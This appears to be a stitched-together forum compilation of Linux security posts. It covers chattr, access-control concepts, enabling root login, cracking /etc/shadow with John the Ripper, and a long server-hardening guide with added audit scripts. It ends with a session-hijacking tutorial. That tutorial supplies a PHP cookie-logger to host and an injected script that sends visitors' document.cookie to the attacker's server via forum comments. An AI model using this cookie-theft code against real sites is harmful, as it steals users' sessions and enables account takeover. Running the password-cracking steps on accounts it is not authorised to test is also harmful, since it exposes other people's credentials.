[Screenshot: showing the importance of the "chattr" command]

1. I created a file "impfile" under /tmp
2. Made it immutable with chattr +i impfile
3. Tried to delete the file (logged in as root) -- FAILED
4. Tried to modify the contents of the file (as root) -- FAILED
5. Tried to create a link to the file (as root) -- FAILED

Now that's a HACK!!!!

PS: whenever you need to remove the file, for whatever reason, just run:

PHP Code:
chattr -i filename

and then delete it as usual. Note that this is a guard against accidents, not against an attacker who already has root: root can run chattr -i too, so the attribute does not make the file tamper-proof. As shown:

[Screenshot: deleting a file after removing the attribute with chattr -i]

OS HARDENING LINUX SECURITY

LINUX SECURITY: see the accompanying slides as well. The lecture outline:

CISCO routers used in Enterprise Networks
UNIX/Linux based Networks used in:
Universities
Small-to-Medium sized companies
Lecture Covers the following topics:
Secure UNIX/Linux workstations & Servers
Limiting Resource
Kernel tunable parameters
Secure Linux Networks – IPTABLES
Firewalls
Auditing tools
RPM, Snort, Portsentry
Intrusion Detection – IDS/NIDS
OpenSSH
Performance Tuning of Linux Workstations & Servers
KERBEROS for authentication
Partitions, resize partitions, run levels
Booting into rescue mode
Planning for disasters, Backup
IDE hard drive tuning
Resource Monitoring & Speed up Networks

ACCESS CONTROL FACTS FROM SECURITY POINT OF VIEW

* Access control is the ability to permit or deny the privileges that users have when accessing resources on a network or computer. Access control involves three entities:

=> Objects are the data, applications, systems, networks, and physical space.

=>Subjects are the users, applications, or processes that need access to objects.

=>The access control system includes the policies, procedures, and technologies that are implemented to control a subject's access to an object.

======================================================

* Access control includes the following processes:

=> Identification identifies the subject. Examples include a username or a user ID number.

=> Authentication is the process of validating a subject's identity. It includes the identification process, the user providing input to prove identity, and the system accepting that input as valid.

=> Authorization is granting or denying a subject access to an object, based on the level of permissions or the actions allowed on the object.

=>Auditing (also referred to as accounting) is maintaining a record of a subject's activity within the information system.
Note: Authentication, authorization, and auditing are known as the AAA of access control.

======================================================
* An access control policy defines the steps and measures that are taken to control access to objects by subjects. Access controls can be classified according to the function they perform:

=> Preventive access controls deter intrusion or attacks, for example, separation of duties or dual-custody processes.

=> Detective access controls search for details about the attack or the attacker, for example, intrusion detection systems.

=> Corrective access controls implement short-term repairs to restore basic functionality following an attack.

=> Deterrent access controls discourage continued or escalations of attacks during an attack.

=> Recovery access controls restore the system to normal operations after the attack and short-term stabilization period.

=> Compensating (also called compensative) access controls are alternatives used when a primary access control cannot be applied.
======================================================

* Access control measures can also be classified based on how they restrict or control access:

=> Administrative controls are policies that describe accepted practices. Examples are directive policies and employee awareness training.

=> Technical controls are computer mechanisms that restrict access.
Examples are encryption, one-time passwords, access control lists, and firewall rules.

=> Physical controls restrict physical access. Examples are perimeter security, site location, networking cables, and employee segregation.


On a computer network, a directory service is an example of a technical access control system that you use to manage and enforce access control policies. Examples of directory services are:

=> Active Directory for Microsoft Windows networks.

=> Novell's eDirectory for NetWare, Linux, and Windows networks.

======================================================

* Within the directory service:

=> A user account is created for each subject.
Identification is performed during logon by supplying a valid user account name.

=> Authentication is performed during logon by supplying the password or other requirements for proving identity.

=> Authorization to use network resources, such as files, printers, or computers, is controlled by identifying permissions or rights.

=> Auditing is performed by the operating system as it tracks actions taken by subjects on objects.

Enable Root Account

To enable the root account in Kubuntu / Ubuntu

1) Install a text editor if you do not have one (kwrite or gedit):

- sudo apt-get install kwrite

2) Open the KDM configuration in the editor:

sudo kwrite /etc/kde4/kdm/kdmrc

3) Search for the setting that allows root to log in (AllowRootLogin=false, in the [X-:*-Core] section).

4) Change the value from false to true.

5) Give the root account a password (Ubuntu ships with the root account locked):

- sudo passwd root

6) Enter the new password for root, then reboot (or restart the display manager) and log in as root.

To enable the root account in Fedora / other Linux

1) Install a text editor (kwrite or gedit):

- su -c 'yum install kwrite'

2) Edit the two GDM PAM files. In each one, comment out (prefix with #) the line that refuses root, so that it reads as shown:

- su -c 'vim /etc/pam.d/gdm'

#auth required pam_succeed_if.so user != root quiet

- su -c 'vim /etc/pam.d/gdm-password'

#auth required pam_succeed_if.so user != root quiet

3) Set a password for the root account (passwd root as root) and restart to log in as root.

Logging in to a desktop session as root means every application you start runs with full privileges; running single commands through sudo (or su) is the safer model and is the reason Ubuntu locks root by default.

John the Ripper

This is the method to install and use John the Ripper on Fedora.

1) Download John the Ripper (the 1.7.3.1 tarball):

http://www.ziddu.com/download/6365223/jo...ar.gz.html

2) Extract it, then copy the patch text from:

http://www.openwall.com/lists/john-users/2009/09/02/3

3) Save the copied text in the john folder as john.patch.

4) Open a terminal and go to the john folder:

cd Desktop/john-1.7.3.1

5) Apply the patch to the john source with the following command:

patch -Np1 -i john.patch

6) Go to the src folder:

cd src

7) Build it (this target needs a CPU with SSE2; run make without a target to list the others):

make linux-x86-sse2

8) Go back up and into the run folder: cd ../run

9) Combine the password and shadow files into a single file John can read (you must be root to read /etc/shadow):

./unshadow /etc/passwd /etc/shadow > filename

10) Finally, run John against that file to crack the passwords:

./john filename

Cracked passwords are printed as John finds them and can be listed again later with ./john --show filename.

BackTrack 4 R2 released

What's new in this release:

* Kernel 2.6.35.8 – *Much* improved mac80211 stack.
* USB 3.0 support.
* New wireless cards supported.
* All wireless Injection patches applied, maximum support for wireless attacks.
* Even *faster* desktop environment.
* Revamped Fluxbox environment for the KDE challenged.
* Metasploit rebuilt from scratch, MySQL db_drivers working out of the box.
* Updated old packages, added new ones, and removed obsolete ones.
* New BackTrack Wiki with better documentation and support.
* Our most professional, tested and streamlined release ever.

For those wanting to upgrade an older release of BT4, an apt-get update && apt-get dist-upgrade should do the job.

Read-only file for root

Use these commands:
chattr +i filename    (make the file immutable: read-only even for root)
chattr -i filename    (remove the attribute again)

20 Linux Server Hardening Security Tips

Securing your Linux server is important to protect your data, intellectual property and time from attackers. The system administrator is responsible for securing the Linux box. In this first part of a Linux server security series, I provide 20 hardening tips for a default installation of a Linux system.

#1: Encrypt Data Communication

All data transmitted over a network is open to monitoring. Encrypt transmitted data whenever possible, with a password or using keys / certificates.

1. Use scp, ssh, rsync or sftp for file transfer. You can also mount a remote server's file system or your own home directory using sshfs, which is built on FUSE.
2. GnuPG allows you to encrypt and sign your data and communication, and features a versatile key management system as well as access modules for all kinds of public key directories.
3. Fugu is a graphical front end to the command-line Secure File Transfer application (SFTP). SFTP is similar to FTP, but unlike FTP the entire session is encrypted, so no passwords are sent in cleartext and it is much less vulnerable to third-party interception. Another option is FileZilla, a cross-platform client that supports FTP, FTP over SSL/TLS (FTPS) and SSH File Transfer Protocol (SFTP).
4. OpenVPN is a cost-effective, lightweight SSL VPN.
5. Lighttpd SSL (Secure Sockets Layer) HTTPS configuration and installation.
6. Apache SSL (Secure Sockets Layer) HTTPS (mod_ssl) configuration and installation.

#1.1: Avoid Using FTP, Telnet, And Rlogin / Rsh

Under most network configurations, user names, passwords, FTP / telnet / rsh commands and transferred files can be captured by anyone on the same network using a packet sniffer. The common solution is to use OpenSSH, SFTP, or FTPS (FTP over SSL/TLS), which adds SSL/TLS encryption to FTP. Type the following command to remove NIS, rsh and the other outdated services:

PHP Code:
# yum erase inetd xinetd ypserv tftp-server telnet-server rsh-server

#2: Minimize Software to Minimize Vulnerability

Do you really need all sorts of web services installed? Avoid installing unnecessary software, so that you are not exposed to vulnerabilities in software you do not use. Use the package manager (yum on RPM-based systems, apt-get and dpkg on Debian-based ones) to review the full set of installed packages on a system and delete all unwanted packages.

PHP Code:
# yum list installed
# yum list packageName
# yum remove packageName

OR

PHP Code:
# dpkg --list
# dpkg --info packageName
# apt-get remove packageName

#3: One Network Service Per System or VM Instance

Run different network services on separate servers or VM instances. This limits the number of other services that can be compromised. For example, if an attacker is able to exploit a flaw in software such as Apache, he / she gets access to the entire server, including other services such as MySQL, the e-mail server and so on. See how to install virtualization software:

* Install and Setup XEN Virtualization Software on CentOS Linux 5
* How To Setup OpenVZ under RHEL / CentOS Linux

#4: Keep Linux Kernel and Software Up to Date

Applying security patches is an important part of maintaining a Linux server. Linux provides all necessary tools to keep your system updated, and also allows for easy upgrades between versions. All security updates should be reviewed and applied as soon as possible. Again, use the package manager (yum, or apt-get / dpkg) to apply all security updates.

PHP Code:
# yum update

OR

PHP Code:
# apt-get update && apt-get upgrade

You can configure Red Hat / CentOS / Fedora Linux to send yum package update notifications via email. Another option is to apply all security updates via a cron job. Under Debian / Ubuntu Linux you can use apticron to send security notifications.

#5: Use Linux Security Extensions

Linux comes with various security extensions which can be used to guard against misconfigured or compromised programs. If possible, use SELinux and other Linux security extensions to enforce limitations on network and other programs. For example, SELinux provides a variety of security policies for the Linux kernel.

#5.1: SELinux

I strongly recommend using SELinux, which provides a flexible Mandatory Access Control (MAC). Under standard Linux Discretionary Access Control (DAC), an application or process running as a user (UID or SUID) has the user's permissions to objects such as files, sockets, and other processes. Running a MAC kernel protects the system from malicious or flawed applications that can damage or destroy the system. See the official Red Hat documentation which explains SELinux configuration.

#6: User Accounts and Strong Password Policy

Use the useradd / usermod commands to create and maintain user accounts. Make sure you have a good and strong password policy. For example, a good password is at least 8 characters long and mixes letters, numbers, special characters, and upper and lower case. Most importantly, pick a password you can remember. Use tools such as "John the Ripper" to find weak user passwords on your server. Configure pam_cracklib.so to enforce the password policy.

#6.1: Password Aging

The chage command changes the number of days between password changes and the date of the last password change. This information is used by the system to determine when a user must change his/her password. The /etc/login.defs file defines the site-specific configuration for the shadow password suite including password aging configuration. To disable password aging, enter:

PHP Code:
chage -M 99999 userName

To get password expiration information, enter:

PHP Code:
chage -l userName

Finally, you can also edit the /etc/shadow file in the following fields:

PHP Code:
{userName}:{password}:{lastpasswdchanged}:{Minimum_days}:{Maximum_days}:{Warn}:{Inactive}:{Expire}:

Where,

1. Minimum_days: The minimum number of days required between password changes i.e. the number of days left before the user is allowed to change his/her password.

2. Maximum_days: The maximum number of days the password is valid (after that user is forced to change his/her password).

3. Warn : The number of days before password is to expire that user is warned that his/her password must be changed.

4. Expire : Days since Jan 1, 1970 that account is disabled i.e. an absolute date specifying when the login may no longer be used.

I recommend chage command instead of editing the /etc/shadow by hand:

PHP Code:
# chage -M 60 -m 7 -W 7 userName

#6.2: Restricting Use of Previous Passwords

You can prevent all users from reusing their old passwords under Linux. The pam_unix module parameter remember can be used to configure the number of previous passwords that cannot be reused.

#6.3: Locking User Accounts After Login Failures

Under Linux you can use the faillog command to display faillog records or to set login failure limits. faillog formats the contents of the failure log from the /var/log/faillog database / log file. It can also be used to maintain failure counters and limits. To see failed login attempts, enter:

PHP Code:
faillog

To unlock an account after login failures, run:

PHP Code:
faillog -r -u userName

Note you can use the passwd command to lock and unlock accounts:

PHP Code:
# lock account
passwd -l userName
# unlock account
passwd -u userName

#6.4: How Do I Verify No Accounts Have Empty Passwords?

Type the following command

PHP Code:
# awk -F: '($2 == "") {print}' /etc/shadow
Lock all empty password accounts:

PHP Code:
# passwd -l accountName

#6.5: Make Sure No Non-Root Accounts Have UID Set To 0

Only the root account should have UID 0, which grants full permissions to access the system. Type the following command to display all accounts with UID set to 0:

PHP Code:
# awk -F: '($3 == "0") {print}' /etc/passwd
You should only see one line as follows:

PHP Code:
root:x:0:0:root:/root:/bin/bash

If you see other lines, delete them or make sure other accounts are authorized by you to use UID 0.
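
The three checks above (empty password fields in 6.4, non-root UID 0 in 6.5, and the aging fields from 6.1 compared against the recommended chage -M 60 -m 7 -W 7 policy) combined into one audit, as an added example that is not part of the original article. It parses passwd- and shadow-format text as described above; the sample file contents and policy thresholds are constructed for the demonstration, and the hashes are placeholders.

```python
# Added example: audits passwd/shadow-format text for the checks in 6.1, 6.4 and 6.5.
# Sample inputs are constructed; hashes are placeholders, not real password hashes.

MAX_DAYS_POLICY, MIN_DAYS_POLICY, WARN_DAYS_POLICY = 60, 7, 7  # chage -M 60 -m 7 -W 7


def parse_passwd(text):
    """Return {name: uid} from passwd lines (name:x:uid:gid:gecos:home:shell)."""
    users = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) >= 7 and not line.startswith("#"):
            users[fields[0]] = int(fields[2])
    return users


def parse_shadow(text):
    """Return {name: fields} from shadow lines, using the field names listed in 6.1."""
    keys = ("password", "lastchanged", "min_days", "max_days", "warn", "inactive", "expire")
    accounts = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) >= 8 and not line.startswith("#"):
            accounts[fields[0]] = dict(zip(keys, fields[1:8]))
    return accounts


def _days(value):
    """Shadow day fields may be empty; treat empty/non-numeric as None."""
    return int(value) if value.isdigit() else None


def audit_accounts(passwd_text, shadow_text):
    """Return sorted (account, finding) tuples; an empty list means all checks passed."""
    findings = []
    # Section 6.5: only root may have UID 0.
    for name, uid in parse_passwd(passwd_text).items():
        if uid == 0 and name != "root":
            findings.append((name, "non-root account with UID 0"))
    for name, entry in parse_shadow(shadow_text).items():
        pw = entry["password"]
        if pw == "":  # Section 6.4: empty field means login without any password
            findings.append((name, "empty password field"))
            continue
        if pw.startswith(("!", "*")):  # locked or no-login account: aging is irrelevant
            continue
        # Section 6.1: aging disabled (99999 / empty) or looser than the chage policy.
        max_days = _days(entry["max_days"])
        if max_days is None or max_days >= 99999:
            findings.append((name, "password aging disabled"))
        elif max_days > MAX_DAYS_POLICY:
            findings.append((name, f"max_days {max_days} exceeds policy {MAX_DAYS_POLICY}"))
        for field, policy in (("min_days", MIN_DAYS_POLICY), ("warn", WARN_DAYS_POLICY)):
            days = _days(entry[field])
            if days is None or days < policy:
                findings.append((name, f"{field} below policy {policy}"))
    return sorted(findings)


# Constructed sample: 'toor' is a second UID 0 account, 'bob' has no password at all.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
toor:x:0:0:second uid 0:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/bash
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
"""

SAMPLE_SHADOW = """root:$6$PLACEHOLDER:14900:7:60:7:::
toor:$6$PLACEHOLDER:14900:0:99999:7:::
alice:$6$PLACEHOLDER:14900:7:60:7:::
bob::14900:0:99999:7:::
ftp:*:14900:0:99999:7:::
"""

if __name__ == "__main__":
    for account, finding in audit_accounts(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(f"{account}: {finding}")
```

On a real host, feed it the contents of /etc/passwd and /etc/shadow (reading the latter requires root) and treat every finding as something to lock, fix with chage, or remove.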

#7: Disable root Login

Never ever log in as the root user. You should use sudo to execute root-level commands as and when required. sudo greatly enhances the security of the system, since the root password is not shared with other users and admins. sudo provides simple auditing and tracking features too.

#8: Physical Server Security

You must protect Linux servers physical console access. Configure the BIOS and disable the booting from external devices such as DVDs / CDs / USB pen. Set BIOS and grub boot loader password to protect these settings. All production boxes must be locked in IDCs (Internet Data Center) and all persons must pass some sort of security checks before accessing your server. See also:

* 9 Tips To Protect Linux Servers Physical Console Access.

#9: Disable Unwanted Services

Disable all unnecessary services and daemons (services that run in the background). You need to remove all unwanted services from the system start-up. Type the following command to list all services which are started at boot time in run level 3:

PHP Code:
# chkconfig --list | grep '3:on'

To disable a service, enter:

PHP Code:
# service serviceName stop
# chkconfig serviceName off

#9.1: Find Listening Network Ports

Use the following command to list all open ports and associated programs:

PHP Code:
netstat -tulpn

OR

PHP Code:
nmap -sT -O localhost
nmap -sT -O server.example.com

Use iptables to close open ports or stop all unwanted network services using above service and chkconfig commands.

#10: Delete X Windows

X Windows on a server is not required. There is no reason to run X Windows on your dedicated mail and Apache web server. You can disable and remove X Windows to improve server security and performance. Edit /etc/inittab and set the run level to 3. Finally, to remove the X Window System, enter:

PHP Code:
# yum groupremove "X Window System"

#11: Configure Iptables and TCPWrappers

Iptables is a user space application program that allows you to configure the firewall (Netfilter) provided by the Linux kernel. Use the firewall to filter out traffic and allow only necessary traffic. Also use TCPWrappers, a host-based networking ACL system, to filter network access to services. You can prevent many denial of service attacks with the help of Iptables:

* Lighttpd Traffic Shaping: Throttle Connections Per Single IP (Rate Limit).
* How to: Linux Iptables block common attack.
* psad: Linux Detect And Block Port Scan Attacks In Real Time.

#12: Linux Kernel /etc/sysctl.conf Hardening

/etc/sysctl.conf file is used to configure kernel parameters at runtime. Linux reads and applies settings from /etc/sysctl.conf at boot time.

Sample /etc/sysctl.conf:

PHP Code:
# Turn on execshield
kernel.exec-shield=1
kernel.randomize_va_space=1
# Enable IP spoofing protection
net.ipv4.conf.all.rp_filter=1
# Disable IP source routing
net.ipv4.conf.all.accept_source_route=0
# Ignoring broadcasts request
net.ipv4.icmp_echo_ignore_broadcasts=1
net.ipv4.icmp_ignore_bogus_error_messages=1
# Make sure spoofed packets get logged
net.ipv4.conf.all.log_martians = 1

#13: Separate Disk Partitions

Separating the operating system files from user files results in a better and more secure system. Make sure the following filesystems are mounted on separate partitions:

* /usr
* /home
* /var and /var/tmp
* /tmp

Create separate partitions for Apache and FTP server roots. Edit the /etc/fstab file and make sure you add the following configuration options:

1. noexec - Do not set execution of any binaries on this partition (prevents execution of binaries but allows scripts).
2. nodev - Do not allow character or special devices on this partition (prevents use of device files such as zero, sda etc).
3. nosuid - Do not set SUID/SGID access on this partition (prevent the setuid bit).

Sample /etc/fstab entry to limit user access on /dev/sda5 (ftp server root directory):

/dev/sda5 /ftpdata ext3 defaults,nosuid,nodev,noexec 1 2
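
A checker for fstab-format text that reports which of the mount points listed above are not on their own partition or lack the nosuid / nodev / noexec options, as an added example that is not part of the original article. Which options belong on which mount point is my assumption (noexec is left off /usr and /home, where it would break binaries and user tools; /usr and /var are only required to be separate), and the sample fstab is constructed.

```python
# Added example: checks fstab-format text for the separate-partition and
# nosuid/nodev/noexec requirements of section 13. Sample fstab is constructed.

# Mount points the article wants on their own partition, with the mount options
# assumed to belong on each (assumption: no noexec on /usr or /home).
REQUIRED_OPTIONS = {
    "/usr": set(),
    "/home": {"nosuid", "nodev"},
    "/var": set(),
    "/var/tmp": {"nosuid", "nodev", "noexec"},
    "/tmp": {"nosuid", "nodev", "noexec"},
    "/ftpdata": {"nosuid", "nodev", "noexec"},  # the FTP root from the sample entry
}


def parse_fstab(text):
    """Return {mount_point: set(options)} from fstab lines (dev mnt type opts dump pass)."""
    mounts = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 4:
            continue
        mounts[fields[1]] = set(fields[3].split(","))
    return mounts


def check_fstab(text, required=REQUIRED_OPTIONS):
    """Return sorted (mount_point, problem) tuples; empty means every requirement is met."""
    mounts = parse_fstab(text)
    problems = []
    for mount_point, wanted in required.items():
        if mount_point not in mounts:
            problems.append((mount_point, "not on a separate partition"))
            continue
        missing = sorted(wanted - mounts[mount_point])
        if missing:
            problems.append((mount_point, "missing " + ",".join(missing)))
    return sorted(problems)


# Constructed sample: /tmp lacks noexec, and /var and /var/tmp live on the root filesystem.
SAMPLE_FSTAB = """\
/dev/sda1  /         ext3  defaults                       1 1
/dev/sda2  /usr      ext3  defaults                       1 2
/dev/sda3  /home     ext3  defaults,nosuid,nodev          1 2
/dev/sda4  /tmp      ext3  defaults,nosuid,nodev          1 2
/dev/sda5  /ftpdata  ext3  defaults,nosuid,nodev,noexec   1 2
"""

if __name__ == "__main__":
    for mount_point, problem in check_fstab(SAMPLE_FSTAB):
        print(f"{mount_point}: {problem}")
```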

#13.1: Disk Quotas

Make sure disk quota is enabled for all users. To implement disk quotas, use the following steps:

1. Enable quotas per file system by modifying the /etc/fstab file.
2. Remount the file system(s).
3. Create the quota database files and generate the disk usage table.
4. Assign quota policies.
5. See implementing disk quotas tutorial for further details.

#14: Turn Off IPv6

Internet Protocol version 6 (IPv6) provides a new Internet layer of the TCP/IP protocol suite that replaces Internet Protocol version 4 (IPv4) and provides many benefits. Currently there are no good tools which are able to check a system over the network for IPv6 security issues. Most Linux distros have begun enabling the IPv6 protocol by default. Crackers can send bad traffic via IPv6 as most admins are not monitoring it. Unless your network configuration requires it, disable IPv6 or configure a Linux IPv6 firewall.

#15: Disable Unwanted SUID and SGID Binaries

Any file with the SUID/SGID bit enabled can be misused when the SUID/SGID executable has a security problem or bug. Any local or remote user can run such a file. It is a good idea to find all such files. Use the find command as follows (older versions of find accepted -perm +4000 for the same test; current GNU find uses the / form):

PHP Code:
# See all set-user-id files
find / -perm /4000
# See all set-group-id files
find / -perm /2000
# Or combine both in a single command
find / \( -perm -4000 -o -perm -2000 \) -print
find / -xdev -type f -perm /6000 -ls

You need to investigate each reported file. See the reported file's man page for further details.

#15.1: World-Writable Files

Anyone can modify a world-writable file, which can result in a security issue. Use the following command to find all world-writable directories that do not have the sticky bit set (in such a directory any user can delete or rename other users' files):

PHP Code:
find /dir -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print

You need to investigate each reported directory and either set the correct user and group permissions or remove it.

#15.2: Noowner Files

Files not owned by any user or group can pose a security problem. Find the files which do not belong to a valid user or a valid group with the following command:

PHP Code:
find /dir -xdev \( -nouser -o -nogroup \) -print

You need to investigate each reported file and either assign it to an appropriate user and group or remove it.

#16: Use A Centralized Authentication Service

Without a centralized authentication system, user auth data becomes inconsistent, which may lead to out-of-date credentials and forgotten accounts which should have been deleted in the first place. A centralized authentication service allows you to maintain central control over Linux / UNIX account and authentication data. You can keep auth data synchronized between servers. Do not use the NIS service for centralized authentication. Use OpenLDAP for clients and servers.

#16.1: Kerberos

Kerberos performs authentication as a trusted third party authentication service by using cryptographic shared secret under the assumption that packets traveling along the insecure network can be read, modified, and inserted. Kerberos builds on symmetric-key cryptography and requires a key distribution center. You can make remote login, remote copy, secure inter-system file copying and other high-risk tasks safer and more controllable using Kerberos. So, when users authenticate to network services using Kerberos, unauthorized users attempting to gather passwords by monitoring network traffic are effectively thwarted. See how to setup and use Kerberos.

#17: Logging and Auditing

You need to configure logging and auditing to collect all hacking and cracking attempts. By default syslog stores data in /var/log/ directory. This is also useful to find out software misconfiguration which may open your system to various attacks.

#17.1: Monitor Suspicious Log Messages With Logwatch / Logcheck

Read your logs using logwatch or logcheck. These tools make your log reading life easier. You get detailed reporting on unusual items in syslog via email. A sample syslog report:

PHP Code:
################### Logwatch 7.3 (03/24/06) ####################
Processing Initiated: Fri Oct 30 04:02:03 2009
Date Range Processed: yesterday
( 2009-Oct-29 )
Period is day.
Detail Level of Output: 0
Type of Output: unformatted
Logfiles for Host: www-52.nixcraft.net.in
##################################################################

--------------------- Named Begin ------------------------

**Unmatched Entries**
general: info: zone XXXXXX.com/IN: Transfer started.: 3 Time(s)
general: info: zone XXXXXX.com/IN: refresh: retry limit for master ttttttttttttttttttt#53 exceeded (source ::#0): 3 Time(s)
general: info: zone XXXXXX.com/IN: Transfer started.: 4 Time(s)
general: info: zone XXXXXX.com/IN: refresh: retry limit for master ttttttttttttttttttt#53 exceeded (source ::#0): 4 Time(s)

---------------------- Named End -------------------------

--------------------- iptables firewall Begin ------------------------

Logged 87 packets on interface eth0
From 58.y.xxx.ww - 1 packet to tcp(8080)
From 59.www.zzz.yyy - 1 packet to tcp(22)
From 60.32.nnn.yyy - 2 packets to tcp(45633)
From 222.xxx.ttt.zz - 5 packets to tcp(8000,8080,8800)

---------------------- iptables firewall End -------------------------

--------------------- SSHD Begin ------------------------

Users logging in through sshd:
root:
123.xxx.ttt.zzz: 6 times

---------------------- SSHD End -------------------------

--------------------- Disk Space Begin ------------------------

Filesystem Size Used Avail Use% Mounted on
/dev/sda3 450G 185G 241G 44% /
/dev/sda1 99M 35M 60M 37% /boot

---------------------- Disk Space End -------------------------

###################### Logwatch End #########################

(Note output is truncated)
#17.2: System Accounting with auditd

The auditd daemon is provided for system auditing. It is responsible for writing audit records to the disk. During startup, the rules in /etc/audit.rules are read by this daemon. You can open the /etc/audit.rules file and make changes such as setting the audit log file location and other options. With auditd you can record and answer the following:

1. System startup and shutdown events (reboot / halt).
2. Date and time of the event.
3. User responsible for the event (such as trying to access the /path/to/topsecret.dat file).
4. Type of event (edit, access, delete, write, update file & commands).
5. Success or failure of the event.
6. Events that modify the date and time.
7. Who made changes to the system's network settings.
8. Events that modify user/group information.
9. Who made changes to a file, etc.

See our quick tutorial which explains enabling and using the auditd service.
#18: Secure OpenSSH Server

The SSH protocol is recommended for remote login and remote file transfer. However, ssh is open to many attacks. See how to secure OpenSSH server:

* Top 20 OpenSSH Server Best Security Practices.

#19: Install And Use Intrusion Detection System

A network intrusion detection system (NIDS) is an intrusion detection system that tries to detect malicious activity such as denial of service attacks, port scans or even attempts to crack into computers by monitoring network traffic.

It is good practice to deploy integrity checking software before the system goes online in a production environment. If possible, install the AIDE software before the system is connected to any network. AIDE is a host-based intrusion detection system (HIDS); it can monitor and analyse the internals of a computing system.

Snort is a software for intrusion detection which is capable of performing packet logging and real-time traffic analysis on IP networks.

#20: Protecting Files, Directories and Email

Linux offers excellent protections against unauthorized data access. File permissions and MAC prevent unauthorized users from accessing data. However, permissions set by Linux are irrelevant if an attacker has physical access to a computer and can simply move the computer's hard drive to another system to copy and analyze the sensitive data. You can easily protect files and partitions under Linux using the following tools:

* To encrypt and decrypt files with a password, use gpg command.
* Linux or UNIX password protect files with openssl and other tools.
* See how to encrypt directories with ecryptfs.
* TrueCrypt is free open-source disk encryption software for Windows 7/Vista/XP, Mac OS X and Linux.
* Howto: Disk and partition encryption in Linux for mobile devices.
* How to setup encrypted Swap on Linux.

#20.1: Securing Email Servers

You can use SSL certificates and gpg keys to secure email communication on both server and client computers:

Web App. Session Hijacking

Session Hijacking

Analysis of a Telnet Session Hijack via Spoofed MAC Addresses and Session Resynchronization

Introduction
The TCP/IP protocol was designed for a trusting environment and therefore has insufficient security controls. Because of this design, a number of vulnerabilities exist in telnet, which provides a remote terminal session, and in the TCP/IP protocols, that allow an attacker to hijack a telnet session, thus appearing to be the original client to the server. Located on the Internet there are many tools that can automate attacks on TCP/IP networks. For this analysis one of those tools, "hunt," will be used to hijack a telnet session via spoofed MAC (Media Access Control) addresses, and when the attacker has completed issuing commands, he or she will restore the original telnet connection through a resynchronization process.

TCP, IP and MAC Addresses
Hosts that communicate using the TCP/IP protocol basically have the same network architecture as the OSI network model, which has 7 layers. As the flow of data moves down the network stack a header is added to the packet at each layer and then sent down to the next layer. When the packet reaches the destination host the reverse takes place: the header is removed and the packet is passed up to the next layer.

The important headers and their addresses for the analysis are TCP, IP, and MAC. At the Transport layer, the TCP headers will contain the port number (address) of each host. The client will be assigned a port number above 1023 (in the examples the port assigned is 1103) and the server's port number will be a predetermined number (telnet is being used and by convention resides at port number 23). At the Network layer, each host will provide its 4-octet IP address in the header. In the examples the client is 10.0.0.154 and the server is 10.0.0.146. At the Data Link layer, a 6-octet Ethernet MAC address is added to the destination and source fields. Every network card has a unique MAC address that is assigned by the IEEE and manufacturer. In the examples the MAC address for the client is 00-50-04-AD-5E-63

SESSION HIJACKING TUTORIAL

Session hijacking is the process of exploiting a valid computer session, which involves stealing the victim's cookie.

So now, let's understand the basics below.

What is a cookie?

A cookie, also known as a web cookie or HTTP cookie, is a small piece of text stored by the user's browser. A cookie is sent as a header by the web server to the web browser on the client side. A cookie is static and is sent back by the browser unchanged every time it accesses the server.
A cookie has an expiration time that is set by the server and is deleted automatically after the expiration time.
Cookies are used to maintain a user's authentication and to implement a shopping cart during his navigation, possibly across multiple visits.

What can we do after stealing cookie?

Well, as we know web sites authenticate their users with a cookie, it can be used to hijack the victim's session. Our own cookie can be replaced with the victim's stolen cookie to hijack his session.

The following is a cookie stealing script which is to be stored on the attacker's host. It receives the cookie data and stores it to a text file.


PHP Code:
<?php
// Determine the visitor's IP address, checking proxy-supplied headers first.
function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}

// Append one line per request (query string plus request metadata) to log.txt.
function logData()
{
    $ipLog = "log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_globals');
    if ($register_globals)
        $ip = getenv('REMOTE_ADDR');
    else
        $ip = GetIP();
    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['REQUEST_METHOD'];
    $rem_host = $_SERVER['REMOTE_HOST'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date = date("l dS of F Y h:i:s A");
    $log = fopen("$ipLog", "a+");

    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie\n");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
    fclose($log);
}
logData();
?>

Save the script as cookielogger.php on your server (any free web hosting site like justfree, x10hosting etc.).
Also create an empty text file, name it log.txt and upload it.

Now we come to the hardest part, where we have to inject a piece of JavaScript into the site's HTML page, which the victim has to visit. We should now look for a place to post the JavaScript.

Look for user interactive sites which contain comments or forums.

Post the following code which invokes or activates the cookielogger on your host.

Code:
<script language="Java script">
document.location="http://www.yourhost.com/cookielogger.php?cookie=" + document.cookie;
</script>

